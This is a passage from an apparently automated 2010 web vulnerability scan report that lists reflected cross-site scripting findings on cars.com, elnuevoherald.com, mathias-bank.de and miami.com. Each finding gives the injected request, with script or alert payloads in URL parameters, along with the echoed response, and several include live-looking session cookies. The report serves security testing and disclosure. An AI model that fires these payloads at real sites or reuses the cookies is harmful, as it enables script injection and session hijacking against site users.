Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cars_persist=3896579244.20480.0000;

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:36:17 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Content-Length: 15273
Set-Cookie: JSESSIONID=0000t9KR-wg3bwtm-ZrPa-f4Uz6:155htecnj; Path=/
Set-Cookie: Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAwTnSlQzm6gyUo9ep40Ca5T4Hye47Z6DyE=; Expires=Fri, 13 Nov 2015 22:38:41 GMT; Path=/; Domain=www.cars.com
Set-Cookie: affiliate=herald; Expires=Sun, 05 Dec 2010 22:38:41 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Via: 1.1 Cars-XFW
Connection: close
Set-Cookie: cars_persist=3896579244.20480.0000; expires=Sun, 14-Nov-2010 23:08:42 GMT; path=/
Vary: Accept-Encoding, User-Agent


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Cars.com: Dealer Specials</title>
   <link href="/css/globalBeta.css" type="text/css" rel="stylesheet"
...[SNIP]...
<iframe src="javascript:alert(1)//f5fd4a94" width="580" height="1100" frameborder="0">
...[SNIP]...

2.213. http://www.cars.com/go/includes/targeting/vendors.jsp [makename parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/includes/targeting/vendors.jsp

Issue detail

The value of the makename request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a186d"><script>alert(1)</script>13aeb39e616 was submitted in the makename parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /go/includes/targeting/vendors.jsp?makename=a186d"><script>alert(1)</script>13aeb39e616&modelname=&year=&my= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.cars.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.cars.com
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=00006AQWaoFsyLddCkEpMZm_TPv:155ki6a91; Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; affiliate=herald; cars_persist=3896579244.20480.0000; cars_persist=3863024812.20480.0000

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 00:18:49 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Set-Cookie: JSESSIONID=00000EfPi52FUIdHTX1ocavmTd0:155ki6a91; Path=/
Set-Cookie: Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; Expires=Sat, 14 Nov 2015 00:22:05 GMT; Path=/; Domain=www.cars.com
Set-Cookie: affiliate=herald; Expires=Mon, 06 Dec 2010 00:22:05 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Via: 1.1 Cars-XFW
Connection: Keep-Alive
Set-Cookie: cars_persist=3896579244.20480.0000; expires=Mon, 15-Nov-2010 00:52:05 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 1378

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<body>

<iframe src="http://an.tacoda.net/an/slf.htm?siteid=11889&st=&make=a186d&#03
...[SNIP]...
<img src="http://ad.trafficmp.com/a/bpix?top=7-2674.1&make=a186d"><script>alert(1)</script>13aeb39e616&model=&intent=&zip=" />
...[SNIP]...

2.214. http://www.cars.com/go/includes/targeting/vendors.jsp [modelname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/includes/targeting/vendors.jsp

Issue detail

The value of the modelname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90b61"><script>alert(1)</script>d4b3fa8bb16 was submitted in the modelname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /go/includes/targeting/vendors.jsp?makename=&modelname=90b61"><script>alert(1)</script>d4b3fa8bb16&year=&my= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.cars.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.cars.com
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=00006AQWaoFsyLddCkEpMZm_TPv:155ki6a91; Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; affiliate=herald; cars_persist=3896579244.20480.0000; cars_persist=3863024812.20480.0000

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 00:19:18 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Set-Cookie: JSESSIONID=0000fv2MuS4FrMJkgde0tylo8FS:155ki6a91; Path=/
Set-Cookie: Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; Expires=Sat, 14 Nov 2015 00:22:33 GMT; Path=/; Domain=www.cars.com
Set-Cookie: affiliate=herald; Expires=Mon, 06 Dec 2010 00:22:33 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Via: 1.1 Cars-XFW
Connection: Keep-Alive
Set-Cookie: cars_persist=3896579244.20480.0000; expires=Mon, 15-Nov-2010 00:52:34 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 1378

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<body>

<iframe src="http://an.tacoda.net/an/slf.htm?siteid=11889&st=&make=&model=90
...[SNIP]...
<img src="http://ad.trafficmp.com/a/bpix?top=7-2674.1&make=&model=90b61"><script>alert(1)</script>d4b3fa8bb16&intent=&zip=" />
...[SNIP]...

2.215. http://www.cars.com/go/includes/targeting/vendors.jsp [my parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/includes/targeting/vendors.jsp

Issue detail

The value of the my request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d0dd"><script>alert(1)</script>f402f124952 was submitted in the my parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /go/includes/targeting/vendors.jsp?makename=&modelname=&year=&my=2d0dd"><script>alert(1)</script>f402f124952 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.cars.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.cars.com
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=00006AQWaoFsyLddCkEpMZm_TPv:155ki6a91; Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; affiliate=herald; cars_persist=3896579244.20480.0000; cars_persist=3863024812.20480.0000

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 00:19:40 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Set-Cookie: JSESSIONID=0000h8XOtD9oWfwI1fAunHrlOmb:155hteb77; Path=/
Set-Cookie: Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; Expires=Sat, 14 Nov 2015 00:23:20 GMT; Path=/; Domain=www.cars.com
Set-Cookie: affiliate=herald; Expires=Mon, 06 Dec 2010 00:23:20 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Via: 1.1 Cars-XFW
Connection: Keep-Alive
Set-Cookie: cars_persist=3896579244.20480.0000; expires=Mon, 15-Nov-2010 00:53:20 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 1378

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<body>

<iframe src="http://an.tacoda.net/an/slf.htm?siteid=11889&st=2d0dd&#034;&gt;
...[SNIP]...
<img src="http://ad.trafficmp.com/a/bpix?top=7-2674.1&make=&model=&intent=2d0dd"><script>alert(1)</script>f402f124952&zip=" />
...[SNIP]...

2.216. http://www.elnuevoherald.com/reg-bin/int.cgi [version parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elnuevoherald.com
Path:   /reg-bin/int.cgi

Issue detail

The value of the version request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f72c'%3balert(1)//6eca97bbb21 was submitted in the version parameter. This input was echoed as 9f72c';alert(1)//6eca97bbb21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reg-bin/int.cgi?mode=login&version=esp9f72c'%3balert(1)//6eca97bbb21 HTTP/1.1
Host: www.elnuevoherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Vary: Accept-Encoding
Mi-app-host: rdds008p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 14 Nov 2010 22:39:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:39:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 77533

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>

<script
...[SNIP]...
<!--
measure_popularity=false;
mistats.msr = 'ELN|EN';

mistats.pagelevel='Other';
mistats.pagename='registration: ';
mistats.version='1.0|v-esp9f72c';alert(1)//6eca97bbb21';
mistats.taxonomy='notaxonomy||||';
mistats.channel='registration';
mistats.adposition='';


-->
...[SNIP]...

2.217. http://www.elnuevoherald.com/reg-bin/tint.cgi [version parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elnuevoherald.com
Path:   /reg-bin/tint.cgi

Issue detail

The value of the version request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 765c4'%3balert(1)//a86bf71eac9 was submitted in the version parameter. This input was echoed as 765c4';alert(1)//a86bf71eac9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reg-bin/tint.cgi?mode=edit&version=newsletter765c4'%3balert(1)//a86bf71eac9 HTTP/1.1
Host: www.elnuevoherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds017p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 14 Nov 2010 22:39:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:39:36 GMT
Content-Length: 32389
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>

<script
...[SNIP]...
<!--
measure_popularity=false;
mistats.msr = 'ELN|EN';

mistats.pagelevel='Other';
mistats.pagename='registration: ';
mistats.version='1.0|v-newsletter765c4';alert(1)//a86bf71eac9';
mistats.taxonomy='notaxonomy||||';
mistats.channel='registration';
mistats.adposition='';


-->
...[SNIP]...

2.218. http://www.mathias-bank.de/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mathias-bank.de
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91ba8"><script>alert(1)</script>9a5bd6d02c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91ba8\"><script>alert(1)</script>9a5bd6d02c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?91ba8"><script>alert(1)</script>9a5bd6d02c1=1 HTTP/1.1
Host: www.mathias-bank.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:40:39 GMT
Server: Apache/2.2.8 (Ubuntu)
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://www.mathias-bank.de/xmlrpc.php
Set-Cookie: bb2_screener_=1289774439+174.121.222.18; path=/
Set-Cookie: PHPSESSID=0f3d95ccecf9bde143451862e81a94c4; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<a href="/?91ba8\"><script>alert(1)</script>9a5bd6d02c1=1/lang-pref/en/">
...[SNIP]...

2.219. http://www.miami.com/advanced-search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miami.com
Path:   /advanced-search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b0f3"-alert(1)-"6571febded2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced-search?6b0f3"-alert(1)-"6571febded2=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:44:20 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:44:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:44:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
...[SNIP]...
{};
miyahoo.request_type="ac";
miyahoo.container_type="js";
miyahoo.tax_id ="20401001";
miyahoo.content_type ="fn_news";
miyahoo.cstm_sctn_list ="Section";
miyahoo.cstm_content_cat ="|advanced-search?6b0f3"-alert(1)-"6571febded2=1";
miyahoo.slots = {};
miyahoo.slots.above_fold_300_by_100={};
miyahoo.slots.above_fold_300_by_100.ad_size_list=["300x100"];
miyahoo.slots.above_fold_300_by_100.ad_delivery_mode="ipatf";
miyahoo.slot
...[SNIP]...

2.220. http://www.miami.com/deals [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miami.com
Path:   /deals

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3581b"-alert(1)-"133c343be5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals?3581b"-alert(1)-"133c343be5e=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:44:21 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:44:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:44:23 GMT
Content-Length: 22144
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>

...[SNIP]...

miyahoo = {};
miyahoo.request_type="ac";
miyahoo.container_type="js";
miyahoo.tax_id ="20307001";
miyahoo.content_type ="fn_news";
miyahoo.cstm_sctn_list ="Section";
miyahoo.cstm_content_cat ="|deals?3581b"-alert(1)-"133c343be5e=1";
miyahoo.slots = {};
miyahoo.slots.above_fold_300_by_100={};
miyahoo.slots.above_fold_300_by_100.ad_size_list=["300x100"];
miyahoo.slots.above_fold_300_by_100.ad_delivery_mode="ipatf";
miyahoo.slot
...[SNIP]...

2.221. http://www.miami.com/espanol [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miami.com
Path:   /espanol

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2adf"-alert(1)-"b1a172c4bed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /espanol?f2adf"-alert(1)-"b1a172c4bed=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:42:47 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:42:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:42:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
...[SNIP]...
iyahoo = {};
miyahoo.request_type="ac";
miyahoo.container_type="js";
miyahoo.tax_id ="20287501";
miyahoo.content_type ="fn_news";
miyahoo.cstm_sctn_list ="Section";
miyahoo.cstm_content_cat ="|espanol?f2adf"-alert(1)-"b1a172c4bed=1";
miyahoo.slots = {};
miyahoo.slots.above_fold_300_by_100={};
miyahoo.slots.above_fold_300_by_100.ad_size_list=["300x100"];
miyahoo.slots.above_fold_300_by_100.ad_delivery_mode="ipatf";
miyahoo.slot
...[SNIP]...

2.222. http://www.miami.com/galleries [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miami.com
Path:   /galleries

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d478"-alert(1)-"52928c4d4d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /galleries?9d478"-alert(1)-"52928c4d4d7=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:42:39 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:42:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:42:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
...[SNIP]...
ahoo = {};
miyahoo.request_type="ac";
miyahoo.container_type="js";
miyahoo.tax_id ="20268001";
miyahoo.content_type ="fn_news";
miyahoo.cstm_sctn_list ="Section";
miyahoo.cstm_content_cat ="|galleries?9d478"-alert(1)-"52928c4d4d7=1";
miyahoo.slots = {};
miyahoo.slots.above_fold_300_by_100={};
miyahoo.slots.above_fold_300_by_100.ad_size_list=["300x100"];
miyahoo.slots.above_fold_300_by_100.ad_delivery_mode="ipatf";
miyahoo.slot
...[SNIP]...

2.223. http://www.miami.com/gay [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miami.com
Path:   /gay

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af6fa"-alert(1)-"6c3dea84605 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gay?af6fa"-alert(1)-"6c3dea84605=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:43:26 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:43:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:43:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 72751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
...[SNIP]...
'>
miyahoo = {};
miyahoo.request_type="ac";
miyahoo.container_type="js";
miyahoo.tax_id ="20442501";
miyahoo.content_type ="fn_news";
miyahoo.cstm_sctn_list ="Section";
miyahoo.cstm_content_cat ="|gay?af6fa"-alert(1)-"6c3dea84605=1";
miyahoo.slots = {};
miyahoo.slots.above_fold_300_by_100={};
miyahoo.slots.above_fold_300_by_100.ad_size_list=["300x100"];
miyahoo.slots.above_fold_300_by_100.ad_delivery_mode="ipatf";
miyahoo.slot
...[SNIP]...

2.224. http://www.miami.com/hotels [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miami.com
Path:   /hotels

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d989"-alert(1)-"1c56ab040ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotels?4d989"-alert(1)-"1c56ab040ce=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:43:59 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:44:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:44:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 95134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
...[SNIP]...
miyahoo = {};
miyahoo.request_type="ac";
miyahoo.container_type="js";
miyahoo.tax_id ="20413501";
miyahoo.content_type ="fn_news";
miyahoo.cstm_sctn_list ="Section";
miyahoo.cstm_content_cat ="|hotels?4d989"-alert(1)-"1c56ab040ce=1";
miyahoo.slots = {};
miyahoo.slots.above_fold_300_by_100={};
miyahoo.slots.above_fold_300_by_100.ad_size_list=["300x100"];
miyahoo.slots.above_fold_300_by_100.ad_delivery_mode="ipatf";
miyahoo.slot
...[SNIP]...

2.225. http://www.miami.com/movies [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miami.com
Path:   /movies

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c6eb"-alert(1)-"029fda865f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /movies?6c6eb"-alert(1)-"029fda865f4=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:42:30 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:42:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:42:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69125

